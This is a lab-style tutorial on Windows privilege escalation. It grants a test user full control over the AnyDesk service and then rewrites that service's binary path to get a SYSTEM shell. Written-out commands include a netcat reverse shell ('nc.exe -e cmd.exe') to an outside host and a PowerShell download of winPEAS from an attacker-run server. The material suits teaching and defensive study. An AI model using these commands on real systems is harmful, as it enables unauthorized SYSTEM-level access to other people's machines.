Windows Privilege Escalation — Service binary path write-based privesc with Service Full Access

Service binary path write-based privesc with Service Full Access

Before exploiting the service, we will create the vulnerable machine ourselves and perform the exploit.

Let’s Start

Install any Remote desktop application, We will install “Anydesk” , run the application once and close it.

To check services in running condition in our system

$tasklist /svc

$sc qc <service-name>

“AnyDesk” is running from LocalSystem Privilege.

SERVICE_START_NAME — From which privilege the service is running.

LocalSystem is the highest privilege account in the window system. Then comes administrator , and then the user which is member of administrator account.

Lets check for any normal user account.

$net user

Then checking if the “test” user is part of any administrative group.

$net user test

Now install “Process Explorer”. To modify the permission of the services.

Using Process explorer we can change control rights of services.

Process Explorer - Sysinternals

Search “Anydesk” in Process Explorer.

Right Click on AnyDesk.exe → Permission → Add → Advance → Find Now → Add the test user

Give full control to the user.

The purpose of giving full control means I’m giving “control rights”.

Let’s restart this service.

The privilege given to test user will reload.

Now the setup is complete.

Initial Access

Log in as “test” user.

Successfully logged in as test user .

Locate the Netcat executable in your machine , if not present download from github.

Let’s throw a shell using netcat.

Assume like that we exploited one service and got the initial shell.

$nc.exe -e cmd.exe <ip_address> <port_number>

Let’s perform the window privilege escalation attack

(Service binary path write-based privesc with Service Full Access)

Now the question comes , when you have the initial shell what will you do in windows operating system.

The first thing is to upload winpeas without thinking twice.

Start a python server , and download winpeas in window’s system.

$powershell -c wget http://192.168.29.219:8001/winPEASx64.exe -OutFile win.exe

Now run the winpeas i.e., downloaded in the system

Here we are totally interested in “Modifiable Services”

Winpeas showed that , we can perfom fullaccess on Anydesk service . Full access from control point of view

And our running right is “LocalSystem” , means highest privilege.

Our next step is to change the Anydesk executable , give the path to our malicious executable payload and restart the service

As soon as service restarts, it will run as system privilege only , but it will trigger our malicious executable , and we will get System level privilege.

sc config — service confguration

binpath=“” — changing the binary path

Giving Netcat path and providing command line option also

Binary Path has been changed successfully.

Now stop the service

Lets start the service, before starting the service start the netcat listener.

Got the shell successfully by changing binary path